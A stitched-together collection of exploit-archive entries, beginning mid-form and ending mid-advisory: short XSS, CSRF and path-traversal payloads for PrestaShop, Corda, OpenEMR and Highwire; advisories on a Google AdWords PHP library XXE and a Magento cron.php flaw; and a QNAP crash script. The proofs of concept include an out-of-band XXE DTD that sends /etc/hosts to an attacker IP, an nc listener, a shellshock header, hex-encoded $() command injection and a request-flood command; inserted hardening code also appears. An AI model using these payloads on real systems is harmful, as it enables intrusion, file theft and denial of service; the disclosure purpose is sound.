<input type="hidden" name="service" value="test><script>alert(1)</script>" />
<input type="hidden" name="protocol" value="TCP" />
<input type="hidden" name="startPort" value="1" />
<input type="hidden" name="endPort" value="2" />
<input type="hidden" name="block" value="true" />
<input type="submit" title="Enable Service" />
</form>
</html>
source: https://www.securityfocus.com/bid/61158/info
PrestaShop is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
PrestaShop 1.5.4 is vulnerable; other versions may also be affected.
<html>
<head>
</head>
<body>
<img src="http://www.example.com/language/cart?add=&id_product=[Product ID]" width=0 height=0>
</body>
</html>
source: https://www.securityfocus.com/bid/61156/info
Corda .NET Redirector is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Corda .NET Redirector 7.3.11.6715 is vulnerable; other versions may also be affected.
http://www.example.com/Corda/redirector.corda/? () _FILEhttp://<URL>/?<script>alert('Text')</script><iframe src=http://www.example1.com></iframe>@_TEXTDESCRIPTIONEN
# Date: 06.11.2015
# Exploit Author: Dawid Golunski
# Vendor Homepage: https://developers.google.com/adwords/api/docs/clientlibraries
# Software Link: https://github.com/googleads/googleads-php-lib
# Version: Google AdWords API client libraries - XML eXternal Entity Injection (XXE)
=============================================
- Release date: 06.11.2015
- Discovered by: Dawid Golunski
- Severity: Medium/High
=============================================
I. VULNERABILITY
-------------------------
Google AdWords API client libraries - XML eXternal Entity Injection (XXE)
Confirmed in googleads-php-lib <= 6.2.0 for PHP; the AdWords libraries for
other platforms, googleads-java-lib for Java and googleads-dotnet-lib for .NET,
are also likely to be affected.
II. BACKGROUND
-------------------------
- AdWords API
"The AdWords API is a collection of web services that you can use to build
applications that manage AdWords accounts and their associated campaign data.
While the AdWords API is based on SOAP 1.1, high-level client libraries are
provided to help you develop applications more quickly."
AdWords API client libraries are available for different platforms
such as PHP, .NET, Java etc.
These can be found at:
https://developers.google.com/adwords/api/docs/clientlibraries
III. INTRODUCTION
-------------------------
As the Google AdWords API is based on the SOAP protocol, which uses XML to transfer
data, the client API libraries should have the necessary protections against XML
eXternal Entity injection attacks. However, independent research found these
protections to be lacking in several Google AdWords API client libraries,
which could allow XXE attacks on applications/servers that make use of them.
An XXE (XML eXternal Entity) attack is an attack on an application that parses XML
input from untrusted sources using an incorrectly configured XML parser.
The application may be forced to open arbitrary files and/or network resources.
Exploiting XXE issues in PHP applications may also lead to denial of service or,
in some cases (when the 'expect' PHP module is installed), to command
execution.
IV. DESCRIPTION
-------------------------
This advisory focuses on the PHP version of the AdWords API client library.
Other versions of the client library, such as .NET and Java, appear to be
vulnerable in a similar way.
googleads-php-lib contains the following function, which fetches the WSDL from the
remote Google AdWords server:
---[ build_lib/WSDLInterpreter/WSDLInterpreter.php ]---
protected function loadWsdl($wsdlUri, $proxy = null) {
    // Set proxy.
    if ($proxy) {
        $opts = array(
            'http' => array(
                'proxy' => $proxy,
                'request_fulluri' => true
            )
        );
        $context = stream_context_get_default($opts);
        libxml_set_streams_context($context);
    }
    $this->dom = new DOMDocument();
    $this->dom->load($wsdlUri,
        LIBXML_DTDLOAD|LIBXML_DTDATTR|LIBXML_NOENT|LIBXML_XINCLUDE);
    $this->serviceNamespace =
        $this->dom->documentElement->getAttribute('targetNamespace');
}
-------------------------------------------------------
The function connects to the API endpoint to get the WSDL document describing
the functionality of the AdWords web service in XML.
For security reasons the Google AdWords API can only be accessed via HTTPS.
However, the above code does not set appropriate SSL settings on the
https:// stream context: it neither assigns a Certificate Authority (CA)
nor turns the verify_peer option on.
It uses stream_context_get_default() to get the default context,
which on all PHP versions below PHP 5.6.x (see references below) does not
validate the CA by default.
Because of this, applications using the AdWords API library may be tricked into
retrieving data from untrusted sources pretending to be adwords.google.com.
The above code also provides no protection against XXE injection.
It does not disable external entity processing. To make it worse,
it specifically enables that processing via the LIBXML parameters passed to
dom->load(), so an XXE injection attack would work even on
systems that have the newest, fully patched version of the libxml library,
which does not process the entities by default.
Another vulnerable part of the library is the following code:
---[ src/Google/Api/Ads/Common/Util/XmlUtils.php ]---
public static function GetDomFromXml($xml) {
  set_error_handler(array('XmlUtils', 'HandleXmlError'));
  $dom = new DOMDocument();
  $dom->loadXML($xml,
      LIBXML_DTDLOAD | LIBXML_DTDATTR | LIBXML_NOENT | LIBXML_XINCLUDE);
  restore_error_handler();
  return $dom;
}
-----------------------------------------------------
which is used by the AdsSoapClient class to process SOAP messages. It also
activates entity processing even if the libxml parser is set to ignore
entities by default. AdsSoapClient can be configured to verify the SSL peer
via the settings INI file, but this option is off by default.
Together, these SSL settings and the XML entity processing make applications
using the AdWords API vulnerable to XXE injection attacks.
For the attack to succeed, an attacker needs to be in a man-in-the-middle
position impersonating the adwords.google.com server (e.g. via DNS
poisoning/spoofing, proxy attacks, ARP spoofing, etc.) in order to inject
malicious XML.
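The loader above with both gaps closed, as an added example that is not part of the original advisory or of googleads-php-lib. It shows a stream context that actually verifies the server certificate (what loadWsdl() leaves at PHP's pre-5.6 default) and a parser that refuses any DOCTYPE and never passes LIBXML_NOENT, next to a parser using the library's own flags. The demo() function feeds both a constructed payload in the shape of the PoC below, pointing at a local file instead of the attacker's server, so the script runs offline and shows the leak on one side and the rejection on the other. The CA bundle path and the endpoint URL are assumptions; the same hardened flags apply to GetDomFromXml(). Requires PHP 7.1+ with ext/dom.

```php
<?php
// Added example, not googleads-php-lib code: the loadWsdl() pattern from
// section IV beside a hardened form. The CA bundle path and WSDL URL are
// illustrative assumptions; the XML payload and the "secret" file are
// constructed here so the script runs offline.

declare(strict_types=1);

const ADWORDS_WSDL = 'https://adwords.google.com/api/adwords/cm/v201502/CampaignService?wsdl';

// Parser flags used by the library's loadWsdl() / GetDomFromXml() (quoted on the page).
const VULN_FLAGS = LIBXML_DTDLOAD | LIBXML_DTDATTR | LIBXML_NOENT | LIBXML_XINCLUDE;

// Hardened flags: no NOENT (no entity substitution), no DTDLOAD, no XINCLUDE,
// and NONET so nothing is fetched over the network while parsing.
const SAFE_FLAGS = LIBXML_NONET;

/**
 * Stream context that verifies the server certificate. This is what the
 * original code omits: stream_context_get_default() on PHP < 5.6 leaves
 * verify_peer off, so any certificate presented by a MitM is accepted.
 */
function strictTlsContext(?string $proxy = null, string $caBundle = '/etc/ssl/certs/ca-certificates.crt')
{
    $opts = [
        'ssl' => [
            'verify_peer'         => true,
            'verify_peer_name'    => true,      // honoured on PHP >= 5.6
            'allow_self_signed'   => false,
            'cafile'              => $caBundle, // assumption: Debian/Ubuntu bundle location
            'disable_compression' => true,
        ],
    ];
    if ($proxy !== null) {
        $opts['http'] = ['proxy' => $proxy, 'request_fulluri' => true];
    }
    return stream_context_create($opts);
}

/** Mirrors the vulnerable behaviour: external entities are resolved and substituted. */
function parseWsdlVulnerable(string $xml): ?DOMDocument
{
    $dom  = new DOMDocument();
    $prev = libxml_use_internal_errors(true);
    $ok   = $dom->loadXML($xml, VULN_FLAGS);
    libxml_use_internal_errors($prev);
    return $ok ? $dom : null;
}

/** Hardened parse: a WSDL never needs a DTD, so refuse DOCTYPE and never substitute entities. */
function parseWsdlSafe(string $xml): DOMDocument
{
    if (stripos($xml, '<!DOCTYPE') !== false) {
        throw new RuntimeException('WSDL contains a DOCTYPE; refusing to parse');
    }
    $dom  = new DOMDocument();
    $prev = libxml_use_internal_errors(true);
    $ok   = $dom->loadXML($xml, SAFE_FLAGS);
    libxml_use_internal_errors($prev);
    if (!$ok) {
        throw new RuntimeException('WSDL is not well-formed XML');
    }
    return $dom;
}

/** Fetch over verified TLS, then parse with the hardened settings. */
function loadWsdlSafely(string $uri = ADWORDS_WSDL, ?string $proxy = null): DOMDocument
{
    $xml = file_get_contents($uri, false, strictTlsContext($proxy));
    if ($xml === false) {
        throw new RuntimeException('Could not fetch WSDL (TLS verification or network failure)');
    }
    return parseWsdlSafe($xml);
}

/** Offline demonstration: a local file stands in for the attacker's out-of-band target. */
function demo(): array
{
    $secretFile = tempnam(sys_get_temp_dir(), 'xxe');
    file_put_contents($secretFile, 'SECRET-FROM-DISK');

    // Constructed payload in the shape of the advisory's PoC, pointing at the local file.
    $malicious = '<?xml version="1.0"?>' . "\n"
        . '<!DOCTYPE root [<!ENTITY xxetest SYSTEM "file://' . $secretFile . '">]>' . "\n"
        . '<test><testing>&xxetest;</testing></test>';

    $vuln   = parseWsdlVulnerable($malicious);
    $leaked = $vuln !== null && strpos($vuln->textContent, 'SECRET-FROM-DISK') !== false;

    try {
        parseWsdlSafe($malicious);
        $blocked = false;
    } catch (RuntimeException $e) {
        $blocked = true;
    }
    unlink($secretFile);
    return ['vulnerable_parser_leaked_file' => $leaked, 'hardened_parser_rejected' => $blocked];
}

var_export(demo());
```

LIBXML_NONET alone would not have stopped the file:// entity above; the DOCTYPE check and the absence of LIBXML_NOENT are what close the hole, and the strict context is what keeps an impersonated adwords.google.com from delivering the document in the first place.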
V. PROOF OF CONCEPT
-------------------------
Below is a test application that makes use of the PHP Google AdWords API
library.
The application simply connects to the AdWords API endpoint to retrieve the
WSDL document.
---[ testAPI.php ]---
<?php
// Test application reading WSDL from Google AdWords
set_include_path('./build_lib/WSDLInterpreter/');
require_once 'WSDLInterpreter.php';
$wsdlUri = 'https://adwords.google.com/api/adwords/cm/v201502/'
.'CampaignService?wsdl';
$wsdlInterpreter = new WSDLInterpreter($wsdlUri, "AdWordsSoapClient",null,
null, "CampaignService", "v201502", "Ads_Google",
"./src/Google/Api/Ads/AdWords/Lib/AdWordsSoapClient.php", null, true, null);
?>
---------------------
To exploit this application, an attacker needs to perform a MitM attack to
impersonate the adwords.google.com server, as mentioned in the description.
For simplicity, we can add the following entry to /etc/hosts on the victim's
server:
192.168.57.12 adwords.google.com
to simulate a successful MitM attack in which the attacker has, for example,
poisoned the DNS cache to point the adwords subdomain at his malicious web
server (192.168.57.12).
The attacker then needs to host a malicious XML document on that server to
return to the victim. An example payload could look as follows:
$ curl --insecure 'https://192.168.57.12/api/adwords/cm/v201502/CampaignService?wsdl'
<?xml version="1.0"?>
<!DOCTYPE root
[
<!ENTITY xxetest SYSTEM "http://192.168.57.12/adwords_xxe_hack.dtd">
]>
<test><testing>&xxetest;</testing></test>
The XML payload returned by the attacker will cause the vulnerable
AdWords API library to resolve the 'xxetest' entity and connect
back to the attacker's server to retrieve adwords_xxe_hack.dtd.
This can be verified on the victim's server by executing the demonstrated
testAPI.php script:
$ curl http://victims_server/googleads-php-lib-master/testAPI.php
The script will try to retrieve the WSDL/XML document from adwords.google.com
which will provide the above malicious XML.
After the injected entity is read, the attacker will get a connection from the
victim:
attacker@mitm# nc -vv -l 8080
Connection from victims_server port 8080 [tcp/http-alt] accepted
GET /adwords_xxe_hack.dtd HTTP/1.0
Host: 192.168.57.12:8080
At this point the attacker could add further entities to carry out an
out-of-band XXE attack that reads system files (such as /etc/passwd) from the
victim's server, or executes commands via the expect:// PHP wrapper if the
'expect' module is enabled.
For example, this payload:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/hosts">
<!ENTITY % dtd SYSTEM "http://192.168.57.12/send.dtd">
%dtd;
]>
<test><testing>test &send;</testing></test>
together with the following file hosted on the attacker's web server:
---[ send.dtd ]---
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://192.168.57.12:8080/retrieved/%file;'>">
%all;
------------------
would send the base64-encoded contents of /etc/hosts to the attacker in the request path.
VI. BUSINESS IMPACT
-------------------------
The severity of this issue is lowered to medium/high because, despite the XXE
injection vulnerability in the code, the attacker must impersonate the
adwords.google.com server to be able to inject malicious XML.
Where such an attack is possible, the severity grows to high/critical due to
the exploitation possibilities of XXE injection.
VII. SYSTEMS AFFECTED
-------------------------
The latest version of the Google AdWords API PHP client library at the time of
reporting was confirmed to be vulnerable. The client libraries for other
platforms seem to lack the necessary XXE attack preventions too.
For example, the Java version did not set the
'sax/features/external-general-entities' feature to false when creating an
instance of the DocumentBuilderFactory class, and the .NET version of the
AdWords API was missing an explicit 'ProhibitDtd' setting on the XmlReader.
The vulnerabilities were found in googleads-php-lib versions below 5.9.0 and
reported to Google in May 2015; they were fixed in version 6.3.0 of the
AdWords PHP library, so all releases up to 6.2.0 are affected.
VIII. SOLUTION
-------------------------
Install the latest version of the Google AdWords API library available for your
platform, and tighten SSL settings by enabling SSL CA verification in the
library settings file.
IX. REFERENCES
-------------------------
http://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.txt
https://developers.google.com/adwords/api/docs/clientlibraries
https://github.com/googleads/googleads-php-lib
https://developers.google.com/adwords/api/docs/
PHP 5.6.x openssl certificates in PHP streams:
http://php.net/manual/en/migration56.openssl.php
http://legalhackers.com
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. TIMELINE
-------------------------
May 18th, 2015: Advisory created and sent to Google Security Team
Nov 5th, 2015: Google, after half a year, confirms the vulnerability has been patched
Nov 6th, 2015: Advisory released publicly
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
source: https://www.securityfocus.com/bid/61154/info
OpenEMR is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
OpenEMR 4.1.1 patch-12 and prior are vulnerable.
1. Misc > Office Notes ('note' parameter is vulnerable with a POST to
/openemr-4.1.1/interface/main/onotes/office_comments_full.php)
#Request:
POST http://www.example.com/openemr-4.1.1/interface/main/onotes/office_comments_full.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Proxy-Connection: keep-alive
Referer: http://www.example.com/openemr-4.1.1/interface/main/onotes/office_comments_full.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
mode=new&offset=0&active=all&note=<script>alert(document.cookie)</script>
#Response:
<snip>
<tr><td><input type=hidden value='' name='act115' id='act115'><input name='box115' id='box115'
onClick='javascript:document.update_activity.act115.value=this.checked' type=checkbox checked></td><td><label
for='box115' class='bold'>Wed February 06th</label> <label for='box115' class='bold'>(test)</label></td><td><label
for='box115' class='text'><script>alert(document.cookie)</script> </label></td></tr>
<snip>
source: https://www.securityfocus.com/bid/61152/info
Corda Highwire is prone to a path disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to obtain sensitive information that may lead to further attacks.
http://www.example.com/highwire.ashx?url=../../
# Exploit Title: eBay Magento CE <= 1.9.2.1 Unrestricted Cron Script (Potential Code Execution / DoS)
# Date: 06.11.2015
# Exploit Author: Dawid Golunski
# Vendor Homepage: http://magento.com
# Version: eBay Magento CE <= 1.9.2.1 / Magento EE <=1.14.2.1
# Tested on: Linux
# Magento reference ID: APPSEC-1045
=============================================
- Release date: 06.11.2015
- Discovered by: Dawid Golunski
- Severity: Medium
- eBay Magento ref.: APPSEC-1037
=============================================
I. VULNERABILITY
-------------------------
eBay Magento CE <= 1.9.2.1 Unrestricted Cron Script (Potential Code Execution / DoS)
eBay Magento EE <= 1.14.2.1
II. BACKGROUND
-------------------------
- eBay Magento eCommerce
http://magento.com/
"More than 240,000 merchants worldwide put their trust in our eCommerce
software. Magento's eCommerce platform gives you the tools you need to attract
more prospects, sell more products, and make more money. It's what we do.
We're owned by eBay, so you know we're eCommerce experts"
III. INTRODUCTION
-------------------------
The default installation of the eBay Magento eCommerce software comes with a
cron.php script which manages scheduled tasks. The script is not protected by
default and can be publicly accessed.
The publicly exposed cron script poses several potential risks, such as
exploitation of the well known shellshock vulnerability on unpatched systems,
leading to code execution.
The same script has another potential command execution vector that stems from
improper sanitisation of data passed to a shell_exec function.
Apart from the code execution vectors, the script could potentially be used to
perform a DoS attack due to the lack of a locking mechanism that would prevent
the script from spawning multiple instances of its helper shell scripts.
IV. DESCRIPTION
-------------------------
A) Shellshock vector
The Magento cron.php script contains the following command-execution code:
-----[ magento/cron.php ]-----
...
try {
    if (stripos(PHP_OS, 'win') === false) {
        $options = getopt('m::');
        if (isset($options['m'])) {
            if ($options['m'] == 'always') {
                $cronMode = 'always';
            } elseif ($options['m'] == 'default') {
                $cronMode = 'default';
            } else {
                Mage::throwException('Unrecognized cron mode was defined');
            }
        } else if (!$isShellDisabled) {
            $fileName = basename(__FILE__);
            $baseDir = dirname(__FILE__);
            shell_exec("/bin/sh $baseDir/cron.sh $fileName -mdefault 1 > /dev/null 2>&1 &");
            shell_exec("/bin/sh $baseDir/cron.sh $fileName -malways 1 > /dev/null 2>&1 &");
            exit;
        }
...
------------------------------
As can be seen, the script calls shell_exec(), which runs the command through
/bin/sh; on some distributions (e.g. RHEL/CentOS) /bin/sh is a symlink to
/bin/bash, while Debian-based systems use dash, which is not affected by
shellshock.
Although the shellshock vulnerability should be patched, there have been reports
of Linux distributions that insufficiently patched the issue and remained
vulnerable.
Magento's cron.php could be used to exploit the shellshock vulnerability on
unpatched systems which host Magento in CGI mode (which can be easily enabled
via the .htaccess file provided with Magento).
B) Command injection
The script fails to sanitise the $baseDir variable before interpolating it
into the shell command. Input passed to shell execution functions should
always be escaped with the escapeshellcmd / escapeshellarg PHP functions.
Although not exploitable on its own, the lack of escaping could allow
injection of system commands on Magento hosting platforms which offer a
feature to create backups of directories, with a user-chosen name, within the
document root.
If the hosting control panel allows the user to choose the names of such
backups, a user could inject malicious data into the directory name, which
results in command injection when cron.php is run from the backup directory:
the shell evaluates the injected data as soon as shell_exec() receives the
command string containing $baseDir.
C) Denial of Service
As the script lacks both access control and a locking mechanism, it is possible
to remotely request cron.php multiple times in order to make it spawn
multiple instances of the cron.sh script.
As a single execution of the script results in two cron.sh processes, plus a
separate CGI process (if the website runs as CGI), an attacker could overload
the Magento site with multiple requests and create a Denial of Service
condition through process exhaustion.
V. PROOF OF CONCEPT
-------------------------
A) Shellshock vector exploit
Sending the following request to a CGI-enabled Magento site:
GET /magento/cron.php HTTP/1.1
Host: victim_magento_site
User-Agent: () { :; } ; /bin/touch /tmp/magento_cron_hack
will result in command execution on shellshock-affected systems.
The result of the above would be:
victim$ ls -l /tmp/magento_cron_hack
-rw-rw-rw- 1 www-data www-data 0 Jul 26 09:08 /tmp/magento_cron_hack
B) Command injection
Due to the lack of sanitisation, if a malicious Magento user had access
to a backup facility, he could create a backup of the Magento
directory with a command in its name, e.g.:
$(id)
The user could then request the cron.php script via the following request:
GET /magento/$(id)/cron.php HTTP/1.1
Host: victim_magento_site
Because of the shell_exec() function in the quoted sourcecode of cron.php:
---
$baseDir = dirname(__FILE__);
shell_exec("/bin/sh $baseDir/cron.sh $fileName -mdefault 1 > /dev/null 2>&1 &");
---
it would cause the cron.php script to run the following command:
/bin/sh /var/www/magento/$(id)/cron.sh exec.php -mdefault 1 > /dev/null 2>&1 &
The id program runs as soon as the shell evaluates the $() command
substitution (POSIX syntax, so this does not depend on bash).
An attacker could also run more complex commands by hex-encoding characters
that are disallowed within directory names (such as the '/' separator).
For example, he could run the command:
touch /tmp/magento_exec
by encoding it as follows:
echo 'touch /tmp/magento_exec' | hexdump -v -e '"\\\\\\""x" 1/1 "%02x" ""' ${1}
\\\x74\\\x6f\\\x75\\\x63\\\x68\\\x20\\\x2f\\\x74\\\x6d\\\x70\\\x2f\\\x6d\\\x61\\\x67\\\x65\\\x6e\\\x74\\\x6f\\\x5f\\\x65\\\x78\\\x65\\\x63
He could then execute it via a GET request of:
GET /magento/$(`echo%20-e%20\\\x74\\\x6f\\\x75\\\x63\\\x68\\\x20\\\x2f\\\x74\\\x6d\\\x70\\\x2f\\\x6d\\\x61\\\x67\\\x65\\\x6e\\\x74\\\x6f\\\x5f\\\x65\\\x78\\\x65\\\x63`)/exec.php HTTP/1.1
which would execute:
/bin/sh /var/www/magento/exec_poc/$(`echo -e \\\x74\\\x6f\\\x75\\\x63\\\x68\\\x20\\\x2f\\\x74\\\x6d\\\x70\\\x2f\\\x6d\\\x61\\\x67\\\x65\\\x6e\\\x74\\\x6f\\\x5f\\\x65\\\x78\\\x65\\\x63`)/cron.sh exec.php -mdefault 1 > /dev/null 2>&1 &
resulting in creating the PoC file:
victim$ ls -l /tmp/magento_exec
-rw-r--r-- 1 www-data www-data 0 Jul 26 11:20 /tmp/magento_exec
C) Denial of Service
By sending multiple requests to cron.php, for example using apache benchmark
tool:
attacker$ ab -n 500 -c 30 http://victim_magento_site/magento/cron.php
an attacker could exploit the lack of locking to spawn numerous processes,
potentially leading to resource exhaustion and a DoS condition.
The above command would result in creating multiple instances of the
cron.php/cron.sh scripts on the target host:
...
www-data 5529 0.2 1.3 287756 6872 ? Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -mdefault
www-data 5531 0.2 1.1 288000 5848 ? Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -mdefault
www-data 5533 0.2 1.2 288000 6432 ? Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5535 0.3 1.2 288000 6484 ? Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5537 0.3 1.5 288768 7740 ? Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5539 0.3 1.3 287524 6956 ? Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5541 0.3 1.4 288768 7168 ? Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5543 0.3 1.4 288288 7188 ? Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5546 0.3 1.4 288512 7188 ? Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5885 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5886 0.0 0.0 17880 456 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5887 0.0 0.0 17880 456 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5888 0.0 0.0 17880 440 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5889 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5890 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5891 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5899 0.0 0.0 17880 496 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5900 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5901 0.0 0.0 17880 496 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data 5904 0.0 0.0 17880 500 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5907 0.0 0.0 17880 496 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data 5909 0.0 0.0 17880 500 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data 5910 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data 5912 0.0 0.0 17880 464 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5913 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
...
VI. BUSINESS IMPACT
-------------------------
The issue has been rated as medium. Depending on the Magento hosting features
and applied patches code execution could be possible which would increase the
risks.
VII. SYSTEMS AFFECTED
-------------------------
The latest version of eBay Magento CE (1.9.2.1) was confirmed to contain
the vulnerable cron.php script.
The Magento EE versions also contain this problem according to the vendor's
advisory.
VIII. SOLUTION
-------------------------
eBay Magento assigned this issue the ID APPSEC-1037 and supplied a patch
for it within the SUPEE-6788 patch bundle available on the official website.
The patch adds sanitisation around the shell_exec() code; however, the
cron script remains publicly accessible.
It is recommended to protect the cron script by other means.
For example, the script could require a key supplied with the GET request
before proceeding with execution, an approach commonly used by other major
open source solutions.
The simplest measure is to restrict access to the script to certain IPs or
to localhost within the web server configuration.
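A hardened replacement for the web-triggered branch of cron.php quoted in section IV, as an added example that is neither Magento's code nor the SUPEE-6788 patch. It is the counterpart to both the three vectors in the description and the key-based protection recommended above: every value interpolated into the command is escaped (so the $(id) directory name from the PoC reaches /bin/sh as literal text), each worker is wrapped in util-linux flock(1) with -n so a burst of requests cannot stack up cron.sh processes, and the request is gated on a shared key compared in constant time. The lock directory, key and paths are assumptions, and the commands are returned as strings rather than executed so the script runs anywhere (PHP 7.1+).

```php
<?php
// Added example, not Magento's code or the SUPEE-6788 patch: a hardened
// version of the web-triggered branch of cron.php from section IV. Lock
// paths, the key and directory names are illustrative assumptions; the
// commands are returned instead of being passed to shell_exec().

declare(strict_types=1);

const CRON_MODES = ['default', 'always'];

/**
 * Build one worker command. escapeshellarg() single-quotes each value, so a
 * directory called "$(id)" is passed to /bin/sh as literal text instead of a
 * command substitution. "flock -n <lock>" (util-linux) exits at once if the
 * per-mode lock is already held, which is the locking the original lacks.
 */
function buildCronCommand(string $baseDir, string $fileName, string $mode, string $lockDir = '/var/lock'): string
{
    if (!in_array($mode, CRON_MODES, true)) {
        throw new InvalidArgumentException('Unrecognized cron mode');
    }
    $lock   = escapeshellarg("{$lockDir}/magento-cron-{$mode}.lock"); // assumption: writable by the web user
    $script = escapeshellarg("{$baseDir}/cron.sh");
    $file   = escapeshellarg($fileName);
    return "flock -n {$lock} /bin/sh {$script} {$file} -m{$mode} 1 > /dev/null 2>&1 &";
}

/**
 * Constant-time comparison of a key supplied with the request (e.g. ?key=...)
 * against the configured secret, so that reaching cron.php is not enough to run it.
 */
function authorizeCronRequest(?string $providedKey, string $expectedKey): bool
{
    if ($providedKey === null || $expectedKey === '') {
        return false;
    }
    return hash_equals($expectedKey, $providedKey);
}

/** The web-triggered flow: authorise, then produce both worker commands. */
function webCronCommands(array $query, string $baseDir, string $fileName, string $expectedKey): array
{
    if (!authorizeCronRequest($query['key'] ?? null, $expectedKey)) {
        return ['status' => 403, 'commands' => []];
    }
    $commands = [];
    foreach (CRON_MODES as $mode) {
        $commands[] = buildCronCommand($baseDir, $fileName, $mode); // real script: shell_exec($cmd)
    }
    return ['status' => 200, 'commands' => $commands];
}

// Demonstration with the advisory's injected directory name and with a wrong and a right key.
echo buildCronCommand('/var/www/magento/$(id)', 'cron.php', 'default'), "\n";
var_export(webCronCommands(['key' => 'wrong-key'], '/var/www/magento', 'cron.php', 'example-secret'));
echo "\n";
var_export(webCronCommands(['key' => 'example-secret'], '/var/www/magento', 'cron.php', 'example-secret'));
echo "\n";
```

The per-mode lock bounds the damage of a request flood to one short-lived flock process per request; restricting the script to localhost or trusted IPs in the web server configuration, as recommended above, remains the stronger control and the two are complementary.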
IX. REFERENCES
-------------------------
http://legalhackers.com/advisories/Magento-Unrestricted-Cron-Script-Vulnerability.txt
Official eBay Magento website:
http://magento.com/
Patch 'SUPEE-6788 Patch Bundle', addressing 'XXE/XEE Attack on Zend XML
Functionality Using Multibyte Payloads' (APPSEC-1037) is available at:
https://magento.com/security/patches/supee-6788
X. CREDITS
-------------------------
The vulnerabilities have been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
Nov 6th, 2015: Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title : QNap QVR Client 5.1.0.11290 Crash PoC
# Discovery by : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date : 05/11/2015
# Vendor Homepage: http://www.qnapsecurity.com/n/en/
# Software Link : http://download.qnap.com/Surveillance/Utility/QMon_20150630.zip
# Tested Version : 5.1
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python qvr_client_5.1.py
# 2.- Open qvr_client_5.1.txt and copy content to clipboard
# 3.- Open QVR Client
# 4.- Direccion IP/Puerto -> 10.10.10.1 / 80
# 5.- Paste ClipBoard on "Nombre de Usuario"
# 6.- Contraseña -> test
# 7.- Aceptar
# 8.- Crashed
buffer = "\x41" * 260
f = open ("qvr_client_5.1.txt", "w")
f.write(buffer)
f.close()
# Date: 06.11.2015
# Title: Google AdWords API PHP client library <= 6.2.0 Arbitrary PHP Code Execution
# Exploit Author: Dawid Golunski
# Vendor Homepage: https://developers.google.com/adwords/api/docs/clientlibraries
# Software Link: https://github.com/googleads/googleads-php-lib
# Version: <=6.2.0
=============================================
- Release date: 06.11.2015
- Discovered by: Dawid Golunski
- Severity: Medium/High
=============================================
I. VULNERABILITY
-------------------------
Google AdWords API PHP client library <= 6.2.0 Arbitrary PHP Code Execution
(googleads-php-lib)
II. BACKGROUND
-------------------------
